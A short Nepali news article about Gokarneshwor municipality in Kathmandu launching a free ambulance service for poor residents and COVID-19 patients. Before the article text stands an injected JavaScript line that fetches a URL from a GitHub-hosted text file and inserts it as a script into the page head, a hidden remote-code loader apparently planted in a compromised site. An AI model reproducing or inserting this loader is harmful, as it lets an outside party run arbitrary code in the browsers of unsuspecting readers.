;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
गोकर्नेश्वोर नगरपालिकाले कोरोना भाइरस साथै गरिब दुखीलाइ ध्यानमा राखेर निशुल्क एम्बुलेन्स संचालनमा लिएको छ | कोरोना भाइरसको महामारी संगै संचालनमा ल्याएको एम्बुलेन्स अहिले आएर नगरपालिकाबाटै संचालन हुनेगरी नगरपालिका प्रमुख सन्तोष चालिसेको पहलमा निशुल्का एम्बुलेन्स संचालनमा ल्याएको हो | यस अघि पनि कोरोना बिरामीलाई सेवा दिन २ ओटा एम्बुलेन्स संचालनमा ल्याएको थियो | नगरपालिका भरिका गरिब, बिपन्न तथा निम्न बर्गका जनतालाई सेवा दिने हेतुले यो सेवा संचालनमा ल्याएको नगर प्रमुखको भनाइ छ | आपत बिपत पर्दा जो कोहले पनि तुरुन्त सम्पर्क गर्न सक्ने छन् |
फेसबुक प्रतिक्रियाहरु